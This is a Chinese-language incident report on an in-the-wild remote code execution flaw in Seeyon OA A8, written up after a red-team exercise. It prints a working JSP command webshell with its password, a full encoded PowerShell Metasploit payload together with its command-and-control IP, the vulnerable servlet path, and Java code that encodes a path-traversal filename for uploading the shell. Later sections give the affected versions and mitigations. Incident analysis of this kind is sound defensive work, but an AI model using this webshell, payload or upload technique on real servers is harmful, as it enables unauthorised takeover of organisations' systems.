致远 OA A8 远程代码执行漏洞的应急报告

by LauCyun Jun 27 01:52:02 19,503 views

还有三天 HW 行动就要 Game Over,但是红队的攻击越发凶猛,各种藏着捂着的招式都使用出来了,这可不又捕获一只在野的致远 OA 系统 0dayWeary Cat FaceWeary Cat Face

0x0 溯源

根据告警信息及系统日志,发现如下图所示的木马文件:


图1 木马文件

其内容如下:

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

通过分析日志,提取出攻击者的相关操作行为,如下图所示:


图2 攻击行为

发现红队使用执行 Powershell 命令,命令如下:

pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUASgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApA

对 PowerShell 命令进行分析,确认这个是 MSF 框架生成的 Payload,其CC服务器是114.118.83.230:443。

0x1 复现

1 PoC

访问/seeyon/htmlofficeservlet,如果出现如下特征即为存在:


图3 漏洞验证

2 Exp

用 Burp 发送 POST 请求写入 WebShell,如下图所示:


图4 漏洞利用

如上图所示即为写入 Webshell 成功,访问/seeyon/index1.jsp进一步验证是否写入成功,如下图所示即为成功:


图5 访问WebShell

执行ipconfig命令,如下图所示:


图6 执行命令

最后,补充上传文件名的代码,如下:

import java.io.ByteArrayOutputStream;
import java.io.UnsupportedEncodingException;

public class Main {
    String TableBase64 = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6";
    public String DecodeBase64(String paramString) {
        ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();
        String str = "";
        byte[] arrayOfByte2 = new byte[4];
        try {
            int j = 0;
            byte[] arrayOfByte1 = paramString.getBytes();
            while (j < arrayOfByte1.length) {
                for (int i = 0; i <= 3; i++) {
                    if (j >= arrayOfByte1.length) {
                        arrayOfByte2[i] = 64;
                    } else {
                        int k = this.TableBase64.indexOf(arrayOfByte1[j]);
                        if (k < 0) {
                            k = 65;
                        }
                        arrayOfByte2[i] = ((byte) k);
                    }
                    j++;
                }
                localByteArrayOutputStream.write((byte) (((arrayOfByte2[0] & 0x3F) << 2) + ((arrayOfByte2[1] & 0x30) >> 4)));
                if (arrayOfByte2[2] != 64) {
                    localByteArrayOutputStream.write((byte) (((arrayOfByte2[1] & 0xF) << 4) + ((arrayOfByte2[2] & 0x3C) >> 2)));
                    if (arrayOfByte2[3] != 64) {
                        localByteArrayOutputStream.write((byte) (((arrayOfByte2[2] & 0x3) << 6) + (arrayOfByte2[3] & 0x3F)));
                    }
                }
            }
        } catch (StringIndexOutOfBoundsException localStringIndexOutOfBoundsException) {
            //this.FError += localStringIndexOutOfBoundsException.toString();
            System.out.println(localStringIndexOutOfBoundsException.toString());
        }
        try {
            str = localByteArrayOutputStream.toString("GB2312");
        } catch (UnsupportedEncodingException localUnsupportedEncodingException) {
            System.out.println(localUnsupportedEncodingException.toString());
        }
        return str;
    }
    public String EncodeBase64(String var1) {
        ByteArrayOutputStream var2 = new ByteArrayOutputStream();
        byte[] var7 = new byte[4];
        try {
            int var4 = 0;
            byte[] var6 = var1.getBytes("GB2312");
            while (var4 < var6.length) {
                byte var5 = var6[var4];
                ++var4;
                var7[0] = (byte) ((var5 & 252) >> 2);
                var7[1] = (byte) ((var5 & 3) << 4);
                if (var4 < var6.length) {
                    var5 = var6[var4];
                    ++var4;
                    var7[1] += (byte) ((var5 & 240) >> 4);
                    var7[2] = (byte) ((var5 & 15) << 2);
                    if (var4 < var6.length) {
                        var5 = var6[var4];
                        ++var4;
                        var7[2] = (byte) (var7[2] + ((var5 & 192) >> 6));
                        var7[3] = (byte) (var5 & 63);
                    } else {
                        var7[3] = 64;
                    }
                } else {
                    var7[2] = 64;
                    var7[3] = 64;
                }

                for (int var3 = 0; var3 <= 3; ++var3) {
                    var2.write(this.TableBase64.charAt(var7[var3]));
                }
            }
        } catch (StringIndexOutOfBoundsException var10) {
            // this.FError = this.FError + var10.toString();
            System.out.println(var10.toString());
        } catch (UnsupportedEncodingException var11) {
            System.out.println(var11.toString());
        }
        return var2.toString();
    }
    public static void main(String[] args) {
        Main m = new Main();
        System.out.println(m.DecodeBase64("qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6"));
        System.out.println(m.EncodeBase64("..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp"));
    }
}

0x3 漏洞描述

致远互联是中国协同管理软件及云服务领导供应商,专注专注在协同管理软件领域。致远 A8+ 协同管理软件在很多央企、大型公司都有应用。

致远 A8+ 在某些版本上存在远程 Getshell 漏洞。系统某处在无需登录情况下可直接上传任意文件,攻击者一旦上传精心构造的后门文件即可 Getshell,获得目标服务器的权限。目前利用代码已在野外公开,官方提供的补丁程序仍然可利用。

0x4 漏洞影响

1 危害级别

  • 高危

2 影响版本

  • 致远OA A8-V5 V6.1 SP1
  • 致远OA A8+协同管理软件 V7.0
  • 致远OA A8+协同管理软件 V7.0 SP1
  • 致远OA A8+协同管理软件 V7.0 SP2
  • 致远OA A8+协同管理软件 V7.0 SP3
  • 致远OA A8+协同管理软件 V7.1

3 全球态势

据 ZoomEye 统计,在全球范围内对外开放的致远 OA 资产数多达 29,439 个,其中中国受影响的资产数量有 29,275 个,具体分布情况如下图:


图7 各省分布情况

其中大部分分布在北京、广东、四川、江苏等省,具体如下图所示:


图8 国内TOP 10

0x5 修复建议

1 配置URL访问控制策略

部署于公网的致远 A8+ 服务器,可通过 ACL 禁止外网对/seeyon/htmlofficeservlet路径的访问。

2 修改配置文件

注释Seeyon/A8/ApacheJetspeed/webapps/seeyon/WEB-INF/web.xml中的如下内容,并重启应用程序。

<servlet-mapping>
    <servlet-name>htmlofficeservlet</servlet-name>
    <url-pattern>/htmlofficeservlet</url-pattern>
</servlet-mapping>

2 官方补丁

请尽快联系致远官方,索要官方补丁程序。

厂商官网:http://www.seeyon.com/info/company.html

Tags